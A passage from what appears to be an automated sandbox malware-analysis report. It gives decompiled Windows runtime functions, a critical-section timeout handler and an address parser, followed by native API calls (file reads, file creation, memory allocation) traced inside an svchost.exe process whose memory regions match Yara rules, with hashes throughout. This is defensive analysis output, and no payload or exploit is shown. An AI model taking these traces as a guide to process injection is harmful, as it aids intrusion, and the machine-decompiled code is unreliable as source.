								_t44 = E00C21F28(_t71);
							} else {
								_t44 = E00C1F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00C63915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00CA2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00C4EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00C64FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00C73F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00C73F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xd020c0;
								if(_t85 != 0xd020c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00CA217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00C73F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x00c4ec56
0x00c4ec56
0x00c4ec56
0x00c4ec5c
0x00c4ec64
0x00c823e6
0x00c823eb
0x00c823eb
0x00c4ec6a
0x00c4ec6c
0x00c4ec6f
0x00c823f3
0x00c823f8
0x00c823fa
0x00c823fc
0x00c4ec75
0x00c4ec76
0x00c4ec76
0x00c4ec7b
0x00c4ec7c
0x00c4ec7e
0x00c82406
0x00c82407
0x00c8240c
0x00c8240d
0x00c8240d
0x00c8240d
0x00c82414
0x00c82417
0x00c8241e
0x00c82435
0x00c82438
0x00c8243c
0x00c8243f
0x00c82442
0x00c82443
0x00c82446
0x00c82449
0x00c82453
0x00c82455
0x00c8245b
0x00c8245b
0x00c4eb99
0x00c4eb99
0x00c4eb9c
0x00c4eb9d
0x00c4eb9f
0x00c4eba2
0x00c82465
0x00c8246b
0x00c8246d
0x00c4eba8
0x00c4eba9
0x00c4eba9
0x00c4ebae
0x00c4ebb3
0x00c4ebb9
0x00c4ebbb
0x00c82513
0x00c82514
0x00c82519
0x00c8251b
0x00c4ec2a
0x00c4ec2d
0x00c4ec33
0x00c4ec36
0x00c4ec3a
0x00c4ec3e
0x00c4ec40
0x00c4ec47
0x00c4ec47
0x00c4ec40
0x00c222c6
0x00c4ebc1
0x00c4ebc1
0x00c4ebc5
0x00c4ec9a
0x00c4ec9a
0x00c4ebd6
0x00c4ebd6
0x00000000
0x00c4ebbb
0x00c82477
0x00c8247c
0x00c82486
0x00c8248b
0x00c82496
0x00c8249b
0x00c8249d
0x00c824a0
0x00c824a3
0x00c824aa
0x00c824aa
0x00c824a5
0x00c824a5
0x00c824a5
0x00c824ac
0x00c824af
0x00c824b0
0x00c824b3
0x00c824b9
0x00c824ba
0x00c824bb
0x00c824c6
0x00c824cb
0x00c824cd
0x00c824d0
0x00c824d1
0x00c824d4
0x00c824d6
0x00c824d9
0x00c824d9
0x00c824dc
0x00c824df
0x00c824e1
0x00c824e7
0x00c824e9
0x00c824ec
0x00c824ef
0x00c824f2
0x00c824f2
0x00c824ef
0x00c824e7
0x00c824fa
0x00c824ff
0x00c82501
0x00c82503
0x00c82506
0x00c8250b
0x00c4eb8c
0x00c4eb93
0x00000000
0x00000000
0x00c4eb93
0x00000000
0x00c4eb99
0x00c4ec85
0x00c4ec85
0x00c4ec85
0x00000000

Strings

RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00C8248D
RTL: Re-Waiting, xrefs: 00C824FA
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00C824BD

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: 33959af4f5fea39728decb9af744a99885996cf319320a68f5f255609aaa6c23
Instruction ID: 58d6e41b94fbd31691a6c269aafe8d05ada39d83eb3d75d4d2e1f47daba22aa3
Opcode Fuzzy Hash: 33959af4f5fea39728decb9af744a99885996cf319320a68f5f255609aaa6c23
Instruction Fuzzy Hash: AC411870A00204ABC720EB69DC89FAA77A8FF85320F208615F569DB2C1D734EA419B74

Uniqueness

Uniqueness Score: -1.00%

Function 00C5FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C5FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E00C5EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E00C5EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E00C5685D(_t167, 4) == 0) {
								if(E00C5685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E00C5685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E00C5685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00C38980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E00C2DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E00C5EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E00C5EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x00c5fcd1
0x00c5fcd6
0x00c5fcd9
0x00c5fcdc
0x00c5fcdf
0x00c5fce2
0x00c5fce5
0x00c5fce8
0x00c5fceb
0x00c5fced
0x00c5fced
0x00c5fcf3
0x00000000
0x00000000
0x00c5fcfc
0x00c5fcfe
0x00c5fdc1
0x00c8ecbd
0x00000000
0x00c8eccc
0x00c8eccc
0x00c8ecd2
0x00000000
0x00000000
0x00c8ecdf
0x00c8ece0
0x00c8ece4
0x00c8eceb
0x00c8ecee
0x00c8eca8
0x00c8eca8
0x00c8ecaa
0x00c5fd76
0x00c5fd79
0x00c5fdb4
0x00c5fdb5
0x00c5fdb6
0x00000000
0x00c5fdb6
0x00c5fd7e
0x00c8ecfc
0x00c5fe2f
0x00000000
0x00c5fe2f
0x00c8ed08
0x00c8ed0f
0x00c8ed17
0x00c8ed1b
0x00000000
0x00c8ed1b
0x00c5fd88
0x00000000
0x00000000
0x00c5fd94
0x00c5fd99
0x00c5fda1
0x00000000
0x00000000
0x00c5fdb0
0x00000000
0x00c5fdb0
0x00c8ecbd
0x00c5fdc7
0x00c5fdcb
0x00000000
0x00c5fdd7
0x00c5fde3
0x00c5fe06
0x00c71fe7
0x00000000
0x00000000
0x00c71fef
0x00c71ff0
0x00c71ff4
0x00c71ff7
0x00c71ffa
0x00c71ffd
0x00c72000
0x00000000
0x00000000
0x00c8ecf1
0x00000000
0x00c8ecf1
0x00000000
0x00c5fe06
0x00c5fde8
0x00c5fdec
0x00c5fdef
0x00c5fdf2
0x00000000
0x00c5fdf2
0x00c5fdcb
0x00c5fd04
0x00c5fd05
0x00c8ec67
0x00000000
0x00000000
0x00c8ec6f
0x00000000
0x00c8ec6f
0x00c5fd13
0x00c5fd3c
0x00c5fd40
0x00c8ec75
0x00c8ec7a
0x00000000
0x00c8ec8a
0x00c8ec8a
0x00c8ec90
0x00c8ecb2
0x00c5fd73
0x00c5fd73
0x00000000
0x00c5fd73
0x00c8ec95
0x00000000
0x00000000
0x00c8eca1
0x00c8eca4
0x00c8eca5
0x00000000
0x00c8eca5
0x00c8ec7a
0x00c5fd4a
0x00000000
0x00c5fd6e
0x00c5fd6e
0x00c5fd71
0x00000000
0x00c5fd71
0x00c5fd4a
0x00c5fd21
0x00c6a3a1
0x00000000
0x00c6a3a1
0x00c5fd36
0x00c7200b
0x00c72012
0x00000000
0x00000000
0x00c72018
0x00000000
0x00c72018
0x00000000
0x00c5fd36
0x00c5fe0f
0x00c5fe16
0x00c6a3ad
0x00000000
0x00000000
0x00c6a3b3
0x00c6a3b3
0x00c5fe1f
0x00c8ed25
0x00c8ed86
0x00000000
0x00000000
0x00c8ed91
0x00c8ed95
0x00c8ed95
0x00c8ed9a
0x00c8edad
0x00c8edb3
0x00c8edba
0x00c8edc4
0x00c8edc9
0x00000000
0x00c8edcc
0x00c8ed2a
0x00c8ed55
0x00000000
0x00000000
0x00c8ed61
0x00c8ed66
0x00c8ed6e
0x00000000
0x00000000
0x00c8ed7d
0x00000000
0x00c8ed7d
0x00c8ed30
0x00000000
0x00000000
0x00c8ed3c
0x00c8ed43
0x00c8ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 00C5FD94

Memory Dump Source

Source File: 00000005.00000002.2188335788.0000000000C10000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000005.00000002.2188331885.0000000000C00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188380285.0000000000CF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188383966.0000000000D00000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188387733.0000000000D04000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188391203.0000000000D07000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188394508.0000000000D10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2188420082.0000000000D70000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: a5a701feddaec15e1e3cac24f0ce8dbfd56de2aecf94affcc25100cbc5ff02b0
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 3D91A339D00209EFDF28DF59C8466AEB7B4EF55306F20807ED811A7152E7705B8ACB99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: svchost.exe PID: 2380 Parent PID: 1388 svchost.exeCOMMON

Executed Functions

Function 000982CA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000982C5

Strings

!:, xrefs: 0009829C, 000982A8
m;, xrefs: 000982EC, 000982F4

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: !:$m;
API String ID: 2738559852-1986436202
Opcode ID: 98eaebd036bb2a5070bb075ed3dcdc84aea3ea4b89a4aac056b6a51a83871a15
Instruction ID: b9c99e5606b2f7711f8cdb6b2521cef3e4a842bb10b9ccf32697b389e6218348
Opcode Fuzzy Hash: 98eaebd036bb2a5070bb075ed3dcdc84aea3ea4b89a4aac056b6a51a83871a15
Instruction Fuzzy Hash: 3B111872200208ABCB14EF98CC81EDB77A8EF8C750F058159BA1D97241CA30E910CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 000981D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00093BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0009821D

Strings

.z`, xrefs: 0009820D, 00098218

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 54f66134d72e5895203a74e1597a4b849c5be85c1124d214ac3a1456a0e4f0c0
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 87F0B2B2201208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000981CE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00093BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0009821D

Strings

.z`, xrefs: 0009820D, 00098218

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 80a9f1aee758575fc25334fcc65b79d62ea60b5d1de168c0beb8dba9c22bc1ea
Instruction ID: 27017ad5e700902e2bec0e69631acca8f0f241f63b70648138f95ec56a350991
Opcode Fuzzy Hash: 80a9f1aee758575fc25334fcc65b79d62ea60b5d1de168c0beb8dba9c22bc1ea
Instruction Fuzzy Hash: 08F0C4B2201108AFCB08CF88DC85EEB37A9AF8C354F158248FA0D97241C630EC11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0009827C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000982C5

Strings

!:, xrefs: 0009829C, 000982A8

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: !:
API String ID: 2738559852-2595984152
Opcode ID: e73636df57a0d786570a046de995d2779f34c2f5c813e39d851a71f24606f4c3
Instruction ID: e9aeab6c8a6274d7d12ee69d4dc8f122d1674c046811b4913f4b63d07f273d1a
Opcode Fuzzy Hash: e73636df57a0d786570a046de995d2779f34c2f5c813e39d851a71f24606f4c3
Instruction Fuzzy Hash: 8AF097B6210108ABCB14DF89DC81DEB77A9AF8C754F158248BA1D97251D630EC11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00098280, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000982C5

Strings

!:, xrefs: 0009829C, 000982A8

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: !:
API String ID: 2738559852-2595984152
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: e8a0500a2ac4b7a84fe9f6416392c8ffd6bfa165503efab50eac44a2dfd3a6b5
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 46F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000982FA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(@=,?,?,00093D40,00000000,FFFFFFFF), ref: 00098325

Strings

@=, xrefs: 0009831C, 00098324

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: @=
API String ID: 3535843008-2632950984
Opcode ID: 4717d91d3d1c8b4cd9ef4f37b6e1b8118594ce9f805d9042dbce7376191a5065
Instruction ID: bb099f41b96bbf8fb2838026bfd0702790432ec4dff6ec2d18441c4edb781e12
Opcode Fuzzy Hash: 4717d91d3d1c8b4cd9ef4f37b6e1b8118594ce9f805d9042dbce7376191a5065
Instruction Fuzzy Hash: 27E08C76240214AFDB14EFA8CC46EE77B69EF85360F114599FA08AB692C530E9008BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00098300, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(@=,?,?,00093D40,00000000,FFFFFFFF), ref: 00098325

Strings

@=, xrefs: 0009831C, 00098324

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: @=
API String ID: 3535843008-2632950984
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: d3195b798101d0e5feaa660c62fabe49bed0d5a9fb5cae54d3c1cf7ac1affaff
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 7AD012752002146BD710EF98CC45ED7775CEF44750F154455BA189B282C570F90087E0

Uniqueness

Uniqueness Score: -1.00%

Function 000983AA, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983E9

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: d3bcef745aa151d057944a285bfd249d53f4528ab3bed8594b108ef02e2bb2a3
Instruction ID: 6e410f883f868d13e70bb0d0d209f9a3f7a84a6228c5899e33efe6669458c156
Opcode Fuzzy Hash: d3bcef745aa151d057944a285bfd249d53f4528ab3bed8594b108ef02e2bb2a3
Instruction Fuzzy Hash: 1EF0F8B2600108AFDB24DF99CC81EEB7BA9FF98350F158158FE1997281C671E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000983B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983E9

Memory Dump Source

Source File: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 72d1ccd54e935cf078bb80c6ba408fef1e417173842e08f16d131c4ef81a8ae4
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: DCF015B2200208ABCB14DF89CC81EEB77ADAF88750F118148BE0897281C630F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 008E00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008E00CF

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 008E07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008E07B7

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 008DF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DF9FB

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 008DF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 008DF90E

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
